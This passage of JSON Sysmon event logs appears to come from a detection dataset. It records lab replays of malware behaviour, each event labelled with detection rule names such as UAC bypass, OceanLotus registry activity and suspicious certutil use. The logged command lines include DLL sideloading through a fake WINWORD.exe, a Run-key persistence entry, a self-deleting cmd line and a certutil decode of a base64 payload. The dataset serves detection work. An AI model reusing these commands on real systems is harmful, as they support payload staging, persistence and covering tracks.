(WinBuild.160101.0800)","Hashes":"SHA1=231052FA4311FA3501539E34E21A624921E3C270,MD5=CD042F94B63D67E012CFB4297D313248,SHA256=61A84B2D8CA05C11E79DB8E18FEB0FE4BE1B8D555D0BE2651516B144800153AB,IMPHASH=4E00FCA0721761B10A8A7351CEFB0596","Image":"C:\\Windows\\System32\\wermgr.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6311-5F8F-0000-0020E0100900","LogonId":"0x910e0","OriginalFileName":"WerMgr","ParentCommandLine":"rundll32.exe c:\\temp\\winfire.dll,DllRegisterServer","ParentImage":"C:\\Windows\\SysWOW64\\rundll32.exe","ParentProcessGuid":"747F3D96-659B-5F8F-0000-001026C33300","ParentProcessId":2372,"ProcessGuid":"747F3D96-659E-5F8F-0000-001064E03300","ProcessId":5600,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-20 22:33:02.059"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":422695,"Execution_attributes":{"ProcessID":3408,"ThreadID":4448},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-20T22:33:02.063979Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\Public\\tools\\apt\\wwlib\\","Description":"Microsoft Office Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020100A0A00","LogonId":"0xa0a10","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-CA8F-5F8A-0000-001025020B00","ParentProcessId":5104,"ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:27.491"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417068,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:27.499490Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:27.769"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417069,"Execution_attributes":{"ProcessID":3500,"ThreadID":4704},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:28.429353Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:27.769"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417070,"Execution_attributes":{"ProcessID":3500,"ThreadID":4704},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:28.429717Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Office Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Windows\\SysWOW64\\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}","ParentImage":"C:\\Windows\\SysWOW64\\dllhost.exe","ParentProcessGuid":"747F3D96-D8E2-5F8A-0000-0010F28A7200","ParentProcessId":8500,"ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:31.478"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417071,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:31.484036Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:31.615"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417072,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:31.627786Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:31.615"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417073,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:31.628328Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-17 10:48:12.936","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","UtcTime":"2020-10-17 11:43:33.444"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":417074,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:33.449476Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-17 10:48:12.936","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\wwlib.dll","UtcTime":"2020-10-17 11:43:33.444"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":417075,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:33.476471Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MS Office Product Spawning Exe in User Dir","Microsoft Office Product Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8E8-5F8A-0000-00102CEF7200","ProcessId":840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:36.303"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417079,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:36.306601Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MS Office Product Spawning Exe in User Dir"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\explorer.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows Explorer","FileVersion":"10.0.17763.1369 (WinBuild.160101.0800)","Hashes":"SHA1=60E3F357B06AF9EB84FB9019BF08FB4DD109D4EC,MD5=AA0CA518E66F290FE0BAC6169473E8A9,SHA256=0D7CB0B75CD61CDFFE0E53910829FFA5C02C8759EBD27A49E2EF7A907A10E506,IMPHASH=FBEBD61CE702929C1F33B522FD572C5D","Image":"C:\\Windows\\SysWOW64\\explorer.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"EXPLORER.EXE","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8EC-5F8A-0000-001094207300","ProcessId":6552,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:40.835"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417081,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:40.902894Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","MS Office Product Spawning Exe in User Dir"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Microsoft Office Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8F1-5F8A-0000-00108B4B7300","ProcessId":1576,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:45.116"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417083,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:45.120170Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","MS Office Product Spawning Exe in User Dir","Microsoft Office Product Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c ping 127.0.0.1&&del del /F /Q /A:H \"C:\\Users\\IEUser\\AppData\\Roaming\\wwlib.dll\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A","Image":"C:\\Windows\\SysWOW64\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8F5-5F8A-0000-00106B6F7300","ProcessId":1680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:49.217"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417085,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:49.229742Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-27 15:57:25.868","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-7ACC-5CC4-0000-0010B2470300","ProcessId":2772,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","UtcTime":"2019-04-27 15:57:25.868"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6575,"Execution_attributes":{"ProcessID":1912,"ThreadID":996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-27T15:57:25.868863Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-27 15:57:53.634","Image":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-00102B3E0C00","ProcessId":2680,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmart.exe","UtcTime":"2019-04-27 15:57:53.634"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6579,"Execution_attributes":{"ProcessID":1912,"ThreadID":996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-27T15:57:53.650113Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-27 15:57:53.634","Image":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-00102B3E0C00","ProcessId":2680,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmartMax.dll","UtcTime":"2019-04-27 15:57:53.634"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6581,"Execution_attributes":{"ProcessID":1912,"ThreadID":996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-27T15:57:53.650113Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\IEUser\\AppData\\Roaming\\svchost.exe","EventType":"SetValue","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmart.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-0010F9530C00","ProcessId":2992,"RuleName":"technique_id=T1060,technique_name=Registry Run Keys / Start Folder","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\360v","UtcTime":"2019-04-27 15:57:53.806"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":6593,"Execution_attributes":{"ProcessID":1912,"ThreadID":996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-27T15:57:53.884488Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c certutil -f -decode fi.b64 AllTheThings.dll ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-660A-5D3F-0000-0010B9E08500","ProcessId":3184,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:32:58.614"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4888,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:32:58.659405Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"certutil -f -decode fi.b64 AllTheThings.dll ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c certutil -f -decode fi.b64 AllTheThings.dll 